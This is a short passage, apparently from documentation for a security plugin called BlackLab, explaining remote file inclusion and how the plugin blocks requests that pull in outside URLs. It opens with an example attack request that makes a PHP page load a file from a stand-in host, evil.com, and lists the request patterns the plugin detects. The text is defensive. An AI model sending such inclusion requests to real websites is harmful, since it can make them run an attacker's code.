GET /index.php?page=http://evil.com/malware.txtIf not protected, this could execute malicious code from the attacker’s server.## How BlackLab helpsBlackLab’s RFI plugin blocks requests that try to include remote files, such as:URLs starting with http:// or https:// in parametersSuspicious query values that point outside your app